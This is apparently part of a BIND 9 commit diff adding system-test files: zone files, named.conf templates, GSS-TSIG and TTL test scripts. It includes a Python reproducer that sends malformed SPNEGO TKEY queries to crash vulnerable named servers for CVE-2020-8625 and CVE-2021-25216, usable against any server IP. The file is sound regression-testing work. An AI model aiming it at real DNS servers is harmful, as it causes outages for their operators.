+1,62 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; -*- zone -*- +; this was generated by a Samba4 provision, and is typical +; of a AD DNS zone +$ORIGIN example.nil. +$TTL 1W +@ IN SOA blu hostmaster ( + 2010113027 ; serial + 2D ; refresh + 4H ; retry + 6W ; expiry + 1W ) ; minimum + IN NS blu + + IN A 10.53.0.1 +; + +blu IN A 10.53.0.1 +gc._msdcs IN A 10.53.0.1 + +fb33eb58-5d58-4100-a114-256e0a97ffc1._msdcs IN CNAME blu +; +; global catalog servers +_gc._tcp IN SRV 0 100 3268 blu +_gc._tcp.Default-First-Site-Name._sites IN SRV 0 100 3268 blu +_ldap._tcp.gc._msdcs IN SRV 0 100 3268 blu +_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs IN SRV 0 100 3268 blu +; +; ldap servers +_ldap._tcp IN SRV 0 100 389 blu +_ldap._tcp.dc._msdcs IN SRV 0 100 389 blu +_ldap._tcp.pdc._msdcs IN SRV 0 100 389 blu +_ldap._tcp.d86745b4-f3e0-4af3-be03-2130d1534be8.domains._msdcs IN SRV 0 100 389 blu +_ldap._tcp.Default-First-Site-Name._sites IN SRV 0 100 389 blu +_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs IN SRV 0 100 389 blu +; +; krb5 servers +_kerberos._tcp IN SRV 0 100 88 blu +_kerberos._tcp.dc._msdcs IN SRV 0 100 88 blu +_kerberos._tcp.Default-First-Site-Name._sites IN SRV 0 100 88 blu +_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs IN SRV 0 100 88 blu +_kerberos._udp IN SRV 0 100 88 blu +; MIT kpasswd likes to lookup this name on password change +_kerberos-master._tcp IN SRV 0 100 88 blu +_kerberos-master._udp IN SRV 0 100 88 blu +; +; kpasswd +_kpasswd._tcp IN SRV 0 100 464 blu +_kpasswd._udp IN SRV 0 100 464 blu +; +; heimdal 'find realm for host' hack +_kerberos IN TXT EXAMPLE.NIL diff --git a/bin/tests/system/tsiggss/ns1/named.conf.in b/bin/tests/system/tsiggss/ns1/named.conf.in new file mode 100644 index 0000000..1dfa49a --- /dev/null +++ b/bin/tests/system/tsiggss/ns1/named.conf.in @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.1; 127.0.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + tkey-gssapi-keytab "dns.keytab"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example.nil." IN { + type primary; + file "example.nil.db"; + + update-policy { + grant Administrator@EXAMPLE.NIL wildcard * A AAAA SRV CNAME; + grant testdenied@EXAMPLE.NIL wildcard * TXT; + grant "local:auth.sock" external * CNAME; + }; + + /* we need to use check-names ignore so _msdcs A records can be created */ + check-names ignore; +}; diff --git a/bin/tests/system/tsiggss/ns1/testdenied.ccache b/bin/tests/system/tsiggss/ns1/testdenied.ccache Binary files differnew file mode 100644 index 0000000..070e85b --- /dev/null +++ b/bin/tests/system/tsiggss/ns1/testdenied.ccache diff --git a/bin/tests/system/tsiggss/prereq.sh b/bin/tests/system/tsiggss/prereq.sh new file mode 100644 index 0000000..20ae6b6 --- /dev/null +++ b/bin/tests/system/tsiggss/prereq.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +# enable the tsiggss test only if gssapi was enabled +$FEATURETEST --gssapi || { + echo_i "gssapi and krb5 not supported - skipping tsiggss test" + exit 255 +} + +exit 0 diff --git a/bin/tests/system/tsiggss/setup.sh b/bin/tests/system/tsiggss/setup.sh new file mode 100644 index 0000000..3b07647 --- /dev/null +++ b/bin/tests/system/tsiggss/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf + +key=`$KEYGEN -Cq -K ns1 -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n HOST -T KEY key.example.nil.` +cat ns1/example.nil.db.in ns1/${key}.key > ns1/example.nil.db diff --git a/bin/tests/system/tsiggss/tests.sh b/bin/tests/system/tsiggss/tests.sh new file mode 100644 index 0000000..2d5dc8e --- /dev/null +++ b/bin/tests/system/tsiggss/tests.sh @@ -0,0 +1,177 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# tests for TSIG-GSS updates + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +DIGOPTS="@10.53.0.1 -p ${PORT}" + +test_update () { + num="$1" + host="$2" + type="$3" + cmd="$4" + digout="$5" + + cat <<EOF > ns1/update.txt +server 10.53.0.1 ${PORT} +update add $host $cmd +send +answer +EOF + echo_i "testing update for $host $type $cmd" + $NSUPDATE -g -d ns1/update.txt > nsupdate.out${num} 2>&1 || { + echo_i "update failed for $host $type $cmd" + sed "s/^/I:/" nsupdate.out${num} + return 1 + } + + # Verify that TKEY response is signed. + tkeyout=`awk '/recvmsg reply from GSS-TSIG query/,/Sending update to/' nsupdate.out${num}` + pattern="recvmsg reply from GSS-TSIG query .* opcode: QUERY, status: NOERROR, id: .* flags: qr; QUESTION: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; QUESTION SECTION: ;.* ANY TKEY ;; ANSWER SECTION: .* 0 ANY TKEY gss-tsig\. .* ;; TSIG PSEUDOSECTION: .* 0 ANY TSIG gss-tsig\. .* NOERROR 0" + echo $tkeyout | grep "$pattern" > /dev/null || { + echo_i "bad tkey response (not tsig signed)" + return 1 + } + + # Weak verification that TKEY response is signed. + grep -q "flags: qr; QUESTION: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1" nsupdate.out${num} || { + echo_i "bad tkey response (not tsig signed)" + return 1 + } + + out=`$DIG $DIGOPTS -t $type -q $host | grep -E "^${host}"` + lines=`echo "$out" | grep "$digout" | wc -l` + [ $lines -eq 1 ] || { + echo_i "dig output incorrect for $host $type $cmd: $out" + return 1 + } + return 0 +} + + +# Testing updates with good credentials. +KRB5CCNAME="FILE:"`pwd`/ns1/administrator.ccache +export KRB5CCNAME + +echo_i "testing updates to testdc1 as administrator ($n)" +ret=0 +test_update $n testdc1.example.nil. A "86400 A 10.53.0.10" "10.53.0.10" || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing updates to testdc2 as administrator ($n)" +ret=0 +test_update $n testdc2.example.nil. A "86400 A 10.53.0.11" "10.53.0.11" || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing updates to denied as administrator ($n)" +ret=0 +test_update $n denied.example.nil. TXT "86400 TXT helloworld" "helloworld" > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +# Testing denied updates. +KRB5CCNAME="FILE:"`pwd`/ns1/testdenied.ccache +export KRB5CCNAME + +echo_i "testing updates to denied (A) as a user ($n)" +ret=0 +test_update $n testdenied.example.nil. A "86400 A 10.53.0.12" "10.53.0.12" > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing updates to denied (TXT) as a user ($n)" +ret=0 +test_update $n testdenied.example.nil. TXT "86400 TXT helloworld" "helloworld" || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing external update policy (CNAME) ($n)" +ret=0 +test_update $n testcname.example.nil. CNAME "86400 CNAME testdenied.example.nil" "testdenied" > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing external update policy (CNAME) with auth sock ($n)" +ret=0 +$PERL ./authsock.pl --type=CNAME --path=ns1/auth.sock --pidfile=authsock.pid --timeout=120 > /dev/null 2>&1 & +sleep 1 +test_update $n testcname.example.nil. CNAME "86400 CNAME testdenied.example.nil" "testdenied" || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing external update policy (A) ($n)" +ret=0 +test_update $n testcname.example.nil. A "86400 A 10.53.0.13" "10.53.0.13" > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing external policy with SIG(0) key ($n)" +ret=0 +$NSUPDATE -k ns1/Kkey.example.nil.*.private <<END > /dev/null 2>&1 || ret=1 +server 10.53.0.1 ${PORT} +zone example.nil +update add fred.example.nil 120 cname foo.bar. +send +END +output=`$DIG $DIGOPTS +short cname fred.example.nil.` +[ -n "$output" ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "ensure too long realm name is fatal in non-interactive mode ($n)" +ret=0 +$NSUPDATE <<END > nsupdate.out${n} 2>&1 && ret=1 + realm namenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamename +END +grep "realm is too long" nsupdate.out${n} > /dev/null || ret=1 +grep "syntax error" nsupdate.out${n} > /dev/null || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "ensure too long realm name is not fatal in interactive mode ($n)" +ret=0 +$NSUPDATE -i <<END > nsupdate.out${n} 2>&1 || ret=1 + realm namenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamename +END +grep "realm is too long" nsupdate.out${n} > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +[ $status -eq 0 ] && echo_i "tsiggss tests all OK" + +kill `cat authsock.pid` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/tsiggss/tests_isc_spnego_flaws.py b/bin/tests/system/tsiggss/tests_isc_spnego_flaws.py new file mode 100755 index 0000000..6340b5a --- /dev/null +++ b/bin/tests/system/tsiggss/tests_isc_spnego_flaws.py @@ -0,0 +1,219 @@ +#!/usr/bin/python +############################################################################ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. +############################################################################ + +""" +A tool for reproducing ISC SPNEGO vulnerabilities +""" + +import argparse +import datetime +import struct +import time + +import pytest + +pytest.importorskip("dns") +import dns.message +import dns.name +import dns.query +import dns.rdata +import dns.rdataclass +import dns.rdatatype +import dns.rrset + + +class CraftedTKEYQuery: + # pylint: disable=too-few-public-methods + + """ + A class for preparing crafted TKEY queries + """ + + def __init__(self, opts: argparse.Namespace) -> None: + # Prepare crafted key data + tkey_data = ASN1Encoder(opts).get_tkey_data() + # Prepare TKEY RDATA containing crafted key data + rdata = dns.rdata.GenericRdata( + dns.rdataclass.ANY, dns.rdatatype.TKEY, self._get_tkey_rdata(tkey_data) + ) + # Prepare TKEY RRset with crafted RDATA (for the ADDITIONAL section) + rrset = dns.rrset.from_rdata(dns.name.root, dns.rdatatype.TKEY, rdata) + + # Prepare complete TKEY query to send + self.msg = dns.message.make_query( + dns.name.root, dns.rdatatype.TKEY, dns.rdataclass.ANY + ) + self.msg.additional.append(rrset) + + def _get_tkey_rdata(self, tkey_data: bytes) -> bytes: + """ + Return the RDATA to be used for the TKEY RRset sent in the ADDITIONAL + section + """ + tkey_rdata = dns.name.from_text("gss-tsig.").to_wire() # domain + if not tkey_rdata: + return b"" + tkey_rdata += struct.pack(">I", int(time.time()) - 3600) # inception + tkey_rdata += struct.pack(">I", int(time.time()) + 86400) # expiration + tkey_rdata += struct.pack(">H", 3) # mode + tkey_rdata += struct.pack(">H", 0) # error + tkey_rdata += self._with_len(tkey_data) # key + tkey_rdata += struct.pack(">H", 0) # other size + return tkey_rdata + + def _with_len(self, data: bytes) -> bytes: + """ + Return 'data' with its length prepended as a 16-bit big-endian integer + """ + return struct.pack(">H", len(data)) + data + + +class ASN1Encoder: + # pylint: disable=too-few-public-methods + + """ + A custom ASN1 encoder which allows preparing malformed GSSAPI tokens + """ + + SPNEGO_OID = b"\x06\x06\x2b\x06\x01\x05\x05\x02" + + def __init__(self, opts: argparse.Namespace) -> None: + self._real_oid_length = opts.real_oid_length + self._extra_oid_length = opts.extra_oid_length + + # The TKEY RR being sent contains an encoded negTokenInit SPNEGO message. + # RFC 4178 section 4.2 specifies how such a message is constructed. + + def get_tkey_data(self) -> bytes: + """ + Return the key data field of the TKEY RR to be sent + """ + return self._asn1( + data_id=b"\x60", data=self.SPNEGO_OID + self._get_negtokeninit() + ) + + def _get_negtokeninit(self) -> bytes: + """ + Return the ASN.1 DER-encoded form of the negTokenInit message to send + """ + return self._asn1( + data_id=b"\xa0", + data=self._asn1( + data_id=b"\x30", + data=self._get_mechtypelist(), + extra_length=self._extra_oid_length, + ), + extra_length=self._extra_oid_length, + ) + + def _get_mechtypelist(self) -> bytes: + """ + Return the ASN.1 DER-encoded form of the MechTypeList to send + """ + return self._asn1( + data_id=b"\xa0", + data=self._asn1( + data_id=b"\x30", + data=self._get_mechtype(), + extra_length=self._extra_oid_length, + ), + extra_length=self._extra_oid_length, + ) + + def _get_mechtype(self) -> bytes: + """ + Return the ASN.1 DER-encoded form of a bogus security mechanism OID + which consists of 'self._real_oid_length' 0x01 bytes + """ + return self._asn1( + data_id=b"\x06", + data=b"\x01" * self._real_oid_length, + extra_length=self._extra_oid_length, + ) + + def _asn1(self, data_id: bytes, data: bytes, extra_length: int = 0) -> bytes: + """ + Return the ASN.1 DER-encoded form of 'data' to be included in GSSAPI + key data, designated with 'data_id' as the content identifier. Setting + 'extra_length' to a positive integer allows data length indicated in + the ASN.1 DER representation of 'data' to be increased beyond its + actual size. + """ + data_len = struct.pack(">I", len(data) + extra_length) + return data_id + b"\x84" + data_len + data + + +def parse_options() -> argparse.Namespace: + """ + Parse command line options + """ + parser = argparse.ArgumentParser() + parser.add_argument("--server-ip", required=True) + parser.add_argument("--server-port", type=int, default=53) + parser.add_argument("--real-oid-length", type=int, default=1) + parser.add_argument("--extra-oid-length", type=int, default=0) + + return parser.parse_args() + + +def send_crafted_tkey_query(opts: argparse.Namespace) -> None: + """ + Script entry point + """ + + query = CraftedTKEYQuery(opts).msg + print("# > " + str(datetime.datetime.now())) + print(query.to_text()) + print() + + response = dns.query.tcp(query, opts.server_ip, timeout=2, port=opts.server_port) + print("# < " + str(datetime.datetime.now())) + print(response.to_text()) + print() + + +def test_cve_2020_8625(named_port): + """ + Reproducer for CVE-2020-8625. When run for an affected BIND 9 version, + send_crafted_tkey_query() will raise a network-related exception due to + named (ns1) becoming unavailable after crashing. + """ + for i in range(0, 50): + opts = argparse.Namespace( + server_ip="10.53.0.1", + server_port=named_port, + real_oid_length=i, + extra_oid_length=0, + ) + send_crafted_tkey_query(opts) + + +def test_cve_2021_25216(named_port): + """ + Reproducer for CVE-2021-25216. When run for an affected BIND 9 version, + send_crafted_tkey_query() will raise a network-related exception due to + named (ns1) becoming unavailable after crashing. + """ + opts = argparse.Namespace( + server_ip="10.53.0.1", + server_port=named_port, + real_oid_length=1, + extra_oid_length=1073741824, + ) + send_crafted_tkey_query(opts) + + +if __name__ == "__main__": + cli_opts = parse_options() + send_crafted_tkey_query(cli_opts) diff --git a/bin/tests/system/ttl/clean.sh b/bin/tests/system/ttl/clean.sh new file mode 100644 index 0000000..3bb41d9 --- /dev/null +++ b/bin/tests/system/ttl/clean.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ./*/named.conf +rm -f ./*/named.memstats +rm -f ./*/named.run +rm -f ./ns*/managed-keys.bind* diff --git a/bin/tests/system/ttl/ns1/max-example.db b/bin/tests/system/ttl/ns1/max-example.db new file mode 100644 index 0000000..aeaafc7 --- /dev/null +++ b/bin/tests/system/ttl/ns1/max-example.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +max-example. 1209600 IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 1209600 ; minimum (2 weeks) + ) +max-example. 1209600 IN NS ns.max-example. +ns.max-example. 1209600 IN A 10.53.0.1 diff --git a/bin/tests/system/ttl/ns1/min-example.db b/bin/tests/system/ttl/ns1/min-example.db new file mode 100644 index 0000000..87d6e7e --- /dev/null +++ b/bin/tests/system/ttl/ns1/min-example.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +min-example. 0 IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 0 ; minimum (0 seconds) + ) +min-example. 0 IN NS ns.min-example. +ns.min-example. 0 IN A 10.53.0.1 diff --git a/bin/tests/system/ttl/ns1/named.conf.in b/bin/tests/system/ttl/ns1/named.conf.in new file mode 100644 index 0000000..4c771c9 --- /dev/null +++ b/bin/tests/system/ttl/ns1/named.conf.in @@ -0,0 +1,48 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + check-integrity no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "min-example" { + type primary; + file "min-example.db"; +}; + +zone "max-example" { + type primary; + file "max-example.db"; +}; diff --git a/bin/tests/system/ttl/ns2/hints.db b/bin/tests/system/ttl/ns2/hints.db new file mode 100644 index 0000000..c9264bf --- /dev/null +++ b/bin/tests/system/ttl/ns2/hints.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 60 IN NS ns.nil. +ns.nil. 60 IN A 10.53.0.1 diff --git a/bin/tests/system/ttl/ns2/named.conf.in b/bin/tests/system/ttl/ns2/named.conf.in new file mode 100644 index 0000000..d1c56ac --- /dev/null +++ b/bin/tests/system/ttl/ns2/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "."; + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + servfail-ttl 0; + max-recursion-depth 12; + recursion yes; + dnssec-validation no; + min-cache-ttl 60; + min-ncache-ttl 30; + max-cache-ttl 120; + max-ncache-ttl 60; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints.db"; }; diff --git a/bin/tests/system/ttl/prereq.sh b/bin/tests/system/ttl/prereq.sh new file mode 100644 index 0000000..aa97ae2 --- /dev/null +++ b/bin/tests/system/ttl/prereq.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/ttl/setup.sh b/bin/tests/system/ttl/setup.sh new file mode 100644 index 0000000..87c524f --- /dev/null +++ b/bin/tests/system/ttl/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf diff --git a/bin/tests/system/ttl/tests_cache_ttl.py b/bin/tests/system/ttl/tests_cache_ttl.py new file mode 100644 index 0000000..9025283 --- /dev/null +++ b/bin/tests/system/ttl/tests_cache_ttl.py @@ -0,0 +1,32 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import pytest + +pytest.importorskip("dns") +import dns.message +import dns.query + + +@pytest.mark.parametrize( + "qname,rdtype,expected_ttl", + [ + ("min-example.", "SOA", 60), + ("min-example.", "MX", 30), + ("max-example.", "SOA", 120), + ("max-example.", "MX", 60), + ], +) +def test_cache_ttl(qname, rdtype, expected_ttl, named_port): + msg = dns.message.make_query(qname, rdtype) + response = dns.query.udp(msg, "10.53.0.2", timeout=10, port=named_port) + for rr in response.answer + response.authority: + assert rr.ttl == expected_ttl diff --git a/bin/tests/system/unknown/clean.sh b/bin/tests/system/unknown/clean.sh new file mode 100644 index 0000000..1d73edd --- /dev/null +++ b/bin/tests/system/unknown/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out* check.out +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f */*.bk +rm -f */*.bk.* +rm -f ns3/Kexample.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/unknown/large.out b/bin/tests/system/unknown/large.out new file mode 100644 index 0000000..812bde5 --- /dev/null +++ b/bin/tests/system/unknown/large.out @@ -0,0 +1 @@ +\# 48000 45841674994E4F5E4BA43AADA754D631DFB7E12155E7F10C551032B3 E56ED5BA5136C15CDA201E7E5E54FB60A99388B61A565C1CF74CD8AA E1AEE7FBEB54CEBEE065CF2B1B317F67277AE733183C668BA81A7EFE C322D36FB5CC6293AD7F7AE3544A7C64D404C4EEB1B889E9780A213B D548A018BE2E1B6A3B8840D714DDB8C0A66BEAA4C2A1471D216AD0EB 8D2C884960D30FD3FAD058C47EACE42AAB0F0D40A690CA3BAF9616B7 373B889788E891757AE0EEACCD291D87D05DAED8631D1EBF9202F816 59754CA11221E902A69C7BF0039310EDF5305ACE5404DDD02163BE0A 22334879A27BFA7702E13D06F15887261A12ABFD0C01966FA67F97ED 38C521DBCFF8A2AA8DAF53F1EAA7991B6767DA0E68B2EBB38BEB8F1A ADAA30C1185870DAD0091E7AF0BBED453CE081BA5DC87CA5A764592E D7312C6A26F7E358EF35182A49763A61C9A0C5DBDDCF199251381215 51EB3C3CED9F529F03A85429F42F75503EFA6E1301AA7AD9B29C5AAA 